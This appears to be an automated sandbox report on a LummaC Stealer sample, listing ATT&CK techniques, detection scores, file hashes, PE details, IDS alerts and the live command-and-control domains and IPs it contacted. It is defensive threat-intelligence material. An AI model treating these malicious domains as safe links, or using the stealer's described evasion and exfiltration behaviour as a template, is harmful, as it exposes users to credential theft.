File source: Process Memory Space: lumma_phothockey.exe PID: 5392, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: lumma_phothockey.exe PID: 5392, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Disable or Modify Tools	2 OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	231 Virtualization/Sandbox Evasion	LSASS Memory	321 Security Software Discovery	Remote Desktop Protocol	41 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	111 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	231 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	22 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
lumma_phothockey.exe	15%	Virustotal		Browse
lumma_phothockey.exe	26%	ReversingLabs	Win32.Trojan.Generic
lumma_phothockey.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://cegu.shop/g	100%	Avira URL Cloud	malware
https://burnressert.shop/IZ?	0%	Avira URL Cloud	safe
https://cegu.shop/8574262446/ph.txtnge	100%	Avira URL Cloud	malware
https://burnressert.shop/	0%	Avira URL Cloud	safe
http://www.smartassembly.com/webservices/Reporting/	0%	Avira URL Cloud	safe
http://www.smartassembly.com/webservices/UploadReportLogin/GetServerURL	0%	Avira URL Cloud	safe
https://burnressert.shop/api(w	0%	Avira URL Cloud	safe
https://u1.grapplereturnunstamped.shop/iqqhm.dat	0%	Avira URL Cloud	safe
https://burnressert.shop/api	0%	Avira URL Cloud	safe
http://www.smartassembly.com/webservices/Reporting/UploadReport2	0%	Avira URL Cloud	safe
http://www.smartassembly.com/webservices/Reporting/UploadReport2v	0%	Avira URL Cloud	safe
https://u1.grapplereturnunstamped.shop	0%	Avira URL Cloud	safe
https://burnressert.shop:443/apical	0%	Avira URL Cloud	safe
https://cegu.shop/&g	100%	Avira URL Cloud	malware
burnressert.shop	0%	Avira URL Cloud	safe
http://www.smartassembly.com/webservices/UploadReportLogin/	0%	Avira URL Cloud	safe
https://burnressert.shop:443/api	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cegu.shop	185.161.251.21	true	false	high
burnressert.shop	104.21.67.165	true	true	unknown
u1.grapplereturnunstamped.shop	172.67.215.98	true	false	unknown
15.164.165.52.in-addr.arpa	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
kickykiduz.lat	false		high
https://u1.grapplereturnunstamped.shop/iqqhm.dat	false	Avira URL Cloud: safe	unknown
bloodyswif.lat	false		high
savorraiykj.lat	false		high
miniatureyu.lat	false		high
https://burnressert.shop/api	true	Avira URL Cloud: safe	unknown
washyceehsu.lat	false		high
https://cegu.shop/8574262446/ph.txt	false		high
finickypwk.lat	false		high
burnressert.shop	true	Avira URL Cloud: safe	unknown
shoefeatthe.lat	false		high
leggelatez.lat	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://cegu.shop:443/8574262446/ph.txt	lumma_phothockey.exe, 00000004.00000002.3760379544.0000000000797000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cegu.shop/g	lumma_phothockey.exe, 00000004.00000002.3760908997.0000000000823000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://stackoverflow.com/q/14436606/23354	lumma_phothockey.exe, 00000000.00000002.1578962491.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004550000.00000004.00000800.00020000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1552607329.0000000002FBF000.00000004.00000800.00020000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004643000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	lumma_phothockey.exe, 00000000.00000002.1578962491.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004550000.00000004.00000800.00020000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004643000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.smartassembly.com/webservices/Reporting/UploadReport2	lumma_phothockey.exe	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-net	lumma_phothockey.exe, 00000000.00000002.1578962491.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004550000.00000004.00000800.00020000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004643000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.red-gate.com/products/dotnet-development/smartassembly/?utm_source=smartassemblyui&utm_me	lumma_phothockey.exe	false		high
https://cegu.shop/	lumma_phothockey.exe, 00000004.00000002.3760908997.0000000000823000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dfgh.online/invoker.php?compName=	lumma_phothockey.exe, 00000004.00000002.3761035787.0000000000839000.00000004.00000020.00020000.00000000.sdmp, lumma_phothockey.exe, 00000004.00000002.3761226860.0000000002DBC000.00000004.00000800.00020000.00000000.sdmp, lumma_phothockey.exe, 00000004.00000002.3760586379.00000000007BB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://burnressert.shop/IZ?	lumma_phothockey.exe, 00000004.00000002.3761226860.0000000002DBC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.smartassembly.com/webservices/Reporting/	lumma_phothockey.exe	false	Avira URL Cloud: safe	unknown
https://cegu.shop/8574262446/ph.txtnge	lumma_phothockey.exe, 00000004.00000002.3760908997.0000000000823000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.smartassembly.com/webservices/UploadReportLogin/GetServerURL	lumma_phothockey.exe	false	Avira URL Cloud: safe	unknown
https://burnressert.shop/	lumma_phothockey.exe, 00000004.00000002.3761226860.0000000002DBC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cegu.shop/8574262446/ph.txtebKit/537.36	lumma_phothockey.exe, 00000004.00000002.3759966173.00000000001DB000.00000004.00000010.00020000.00000000.sdmp	false		high
https://burnressert.shop/api(w	lumma_phothockey.exe, 00000004.00000002.3761226860.0000000002DBC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.smartassembly.com/webservices/Reporting/UploadReport2v	lumma_phothockey.exe	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-neti	lumma_phothockey.exe, 00000000.00000002.1578962491.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004550000.00000004.00000800.00020000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004643000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cegu.shop/&g	lumma_phothockey.exe, 00000004.00000002.3760908997.0000000000823000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://stackoverflow.com/q/11564914/23354;	lumma_phothockey.exe, 00000000.00000002.1578962491.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004550000.00000004.00000800.00020000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004643000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	lumma_phothockey.exe, 00000000.00000002.1578962491.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004550000.00000004.00000800.00020000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004643000.00000004.00000800.00020000.00000000.sdmp	false		high
https://u1.grapplereturnunstamped.shop	lumma_phothockey.exe, 00000000.00000002.1552607329.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://burnressert.shop:443/apical	lumma_phothockey.exe, 00000004.00000002.3760379544.0000000000797000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://klipgonuh.shop/int_clp_sha.txt	lumma_phothockey.exe, 00000004.00000002.3760908997.0000000000823000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	lumma_phothockey.exe, 00000000.00000002.1552607329.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.smartassembly.com/webservices/UploadReportLogin/	lumma_phothockey.exe	false	Avira URL Cloud: safe	unknown
https://burnressert.shop:443/api	lumma_phothockey.exe, 00000004.00000002.3760379544.0000000000797000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.161.251.21	cegu.shop	United Kingdom	5089	NTLGB	false
172.67.215.98	u1.grapplereturnunstamped.shop	United States	13335	CLOUDFLARENETUS	false
104.21.67.165	burnressert.shop	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1590982
Start date and time:	2025-01-14 17:00:57 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	lumma_phothockey.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/0@4/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 88% Number of executed functions: 249 Number of non-executed functions: 31
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56, 52.165.164.15, 172.202.163.200
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
11:01:56	API Interceptor	27x Sleep call for process: lumma_phothockey.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
185.161.251.21	installer_1.05_37.4.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	Full-Ver_Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	https://patiooutletmaipu.cl/tiendas/head/	Get hash	malicious	LummaC, CAPTCHA Scam ClickFix, LummaC Stealer	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cegu.shop	installer_1.05_37.4.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Full-Ver_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	https://patiooutletmaipu.cl/tiendas/head/	Get hash	malicious	LummaC, CAPTCHA Scam ClickFix, LummaC Stealer	Browse	185.161.251.21

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://microsoft-visio.en.softonic.com/	Get hash	malicious	Unknown	Browse	172.67.74.232
	QUOTATION REQUIRED_Enatel s.r.l..exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	EspPrivStoreAtt116.exe	Get hash	malicious	Unknown	Browse	104.26.1.5
	SPOOOFER776.exe	Get hash	malicious	Unknown	Browse	104.26.0.5
	PlusPrivStoreAtt116.exe	Get hash	malicious	Unknown	Browse	104.26.1.5
	AimPrivStoreAtt117.exe	Get hash	malicious	Unknown	Browse	172.67.72.57
	http://loginmicrosoftonline.al-mutaheda.com/expiration/notice/nRrRc/receiving@accel-inc.com	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	EspPrivStoreAtt116.exe	Get hash	malicious	Unknown	Browse	104.26.0.5
	tpmbypassprivatestore.exe	Get hash	malicious	Unknown	Browse	104.26.1.5
	SPOOOFER776.exe	Get hash	malicious	Unknown	Browse	104.26.1.5
NTLGB	arm4.elf	Get hash	malicious	Unknown	Browse	82.35.153.120
	meth4.elf	Get hash	malicious	Mirai	Browse	81.104.80.85
	arm5.elf	Get hash	malicious	Unknown	Browse	86.17.238.169
	x86_64.elf	Get hash	malicious	Unknown	Browse	86.29.112.71
	meth9.elf	Get hash	malicious	Mirai	Browse	82.35.241.167
	meth5.elf	Get hash	malicious	Mirai	Browse	82.38.234.160
	sh4.elf	Get hash	malicious	Unknown	Browse	77.98.83.183
	https://adarsh-priydarshi-5646.github.io/Netflix-Website	Get hash	malicious	HTMLPhisher	Browse	213.104.15.23
CLOUDFLARENETUS	https://microsoft-visio.en.softonic.com/	Get hash	malicious	Unknown	Browse	172.67.74.232
	QUOTATION REQUIRED_Enatel s.r.l..exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	EspPrivStoreAtt116.exe	Get hash	malicious	Unknown	Browse	104.26.1.5
	SPOOOFER776.exe	Get hash	malicious	Unknown	Browse	104.26.0.5
	PlusPrivStoreAtt116.exe	Get hash	malicious	Unknown	Browse	104.26.1.5
	AimPrivStoreAtt117.exe	Get hash	malicious	Unknown	Browse	172.67.72.57
	http://loginmicrosoftonline.al-mutaheda.com/expiration/notice/nRrRc/receiving@accel-inc.com	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	EspPrivStoreAtt116.exe	Get hash	malicious	Unknown	Browse	104.26.0.5
	tpmbypassprivatestore.exe	Get hash	malicious	Unknown	Browse	104.26.1.5
	SPOOOFER776.exe	Get hash	malicious	Unknown	Browse	104.26.1.5

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	QUOTATION REQUIRED_Enatel s.r.l..exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.215.98
	EspPrivStoreAtt116.exe	Get hash	malicious	Unknown	Browse	172.67.215.98
	SPOOOFER776.exe	Get hash	malicious	Unknown	Browse	172.67.215.98
	PlusPrivStoreAtt116.exe	Get hash	malicious	Unknown	Browse	172.67.215.98
	AimPrivStoreAtt117.exe	Get hash	malicious	Unknown	Browse	172.67.215.98
	EspPrivStoreAtt116.exe	Get hash	malicious	Unknown	Browse	172.67.215.98
	SPOOOFER776.exe	Get hash	malicious	Unknown	Browse	172.67.215.98
	http://www.brillflooring.com	Get hash	malicious	Unknown	Browse	172.67.215.98
	PlusPrivStoreAtt116.exe	Get hash	malicious	Unknown	Browse	172.67.215.98
	AimPrivStoreAtt117.exe	Get hash	malicious	Unknown	Browse	172.67.215.98
a0e9f5d64349fb13191bc781f81f42e1	mWAik6b.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	185.161.251.21 104.21.67.165
	lumma1.exe	Get hash	malicious	LummaC	Browse	185.161.251.21 104.21.67.165
	VRO.exe	Get hash	malicious	Unknown	Browse	185.161.251.21 104.21.67.165
	VRO.exe	Get hash	malicious	Unknown	Browse	185.161.251.21 104.21.67.165
	e0691gXIKs.exe	Get hash	malicious	Unknown	Browse	185.161.251.21 104.21.67.165
	Y4TyDwQzbE.exe	Get hash	malicious	Unknown	Browse	185.161.251.21 104.21.67.165
	DYv2ldz5xT.exe	Get hash	malicious	Unknown	Browse	185.161.251.21 104.21.67.165
	rBFTGm5ioO.exe	Get hash	malicious	Unknown	Browse	185.161.251.21 104.21.67.165

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.271401736714892
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	lumma_phothockey.exe
File size:	210'432 bytes
MD5:	78bd1dff11c56a3138f78ff061c34d5a
SHA1:	9ba8bbac951b07a3fd64729631fe387e0473f10e
SHA256:	18f3749e057ca1d3899cb27c94dac6394e3716ab46be15e98594865e74b779bd
SHA512:	d992d46ef28acc8b36c306ce7610fc64142e2ebaac1ce84bdbb1d6dec63868f69e5e0c8929fe2f04b201999e3d4765545b5277566f0a678b86a67be0e29c52d3
SSDEEP:	3072:EIfZSq/gPyaii68Ffi7mgN+bI8J1HUYXYxA2vIDaeHrtsC2hdRib1:EmN8umL88J10YXYxA2grrtF2Zi
TLSH:	4224196813DD8E22D3BB0BB4A5E13560D738E81887DED78F840411F9BC017E695A7A6F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....M.g.................,...........K... ...`....@.. ....................................`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x434b9b
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67864D93 [Tue Jan 14 11:42:11 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x34b51	0x4a	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x36000	0x57e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x38000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x32ba1	0x32c00	83812f57e46ecb096d66f82393db1f88	False	0.4864724445812808	data	6.294983447152346	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x36000	0x57e	0x600	7442fa63441d60ca05a2092014fed399	False	0.41796875	data	4.036932687003733	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x38000	0xc	0x200	8da434df5a7f95992a096d73ff47d976	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x3605c	0x2fc	data			0.43717277486910994
RT_MANIFEST	0x36394	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-14T17:02:23.529765+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49830	104.21.67.165	443	TCP
2025-01-14T17:02:24.021846+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49830	104.21.67.165	443	TCP
2025-01-14T17:02:24.021846+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49830	104.21.67.165	443	TCP
2025-01-14T17:02:24.529254+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49836	104.21.67.165	443	TCP
2025-01-14T17:02:25.014949+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.7	49836	104.21.67.165	443	TCP
2025-01-14T17:02:25.014949+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49836	104.21.67.165	443	TCP
2025-01-14T17:02:26.021477+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49847	104.21.67.165	443	TCP
2025-01-14T17:02:27.356419+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49856	104.21.67.165	443	TCP
2025-01-14T17:02:27.860232+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.7	49856	104.21.67.165	443	TCP
2025-01-14T17:02:28.716605+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49865	104.21.67.165	443	TCP
2025-01-14T17:02:30.072787+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	59956	104.21.67.165	443	TCP
2025-01-14T17:02:31.192544+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	59965	104.21.67.165	443	TCP
2025-01-14T17:02:32.205880+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	59975	104.21.67.165	443	TCP
2025-01-14T17:02:32.856211+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	59975	104.21.67.165	443	TCP
2025-01-14T17:02:33.989981+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	59984	185.161.251.21	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 17:01:57.473748922 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:57.473777056 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:57.473840952 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:57.490210056 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:57.490231037 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:57.978796959 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:57.978991985 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:57.984410048 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:57.984421015 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:57.984741926 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.026367903 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.036556005 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.079335928 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.344933033 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.344983101 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.345016956 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.345045090 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.345053911 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.345062971 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.345093966 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.345237970 CET	443	49702	172.67.215.98	192.168.2.7
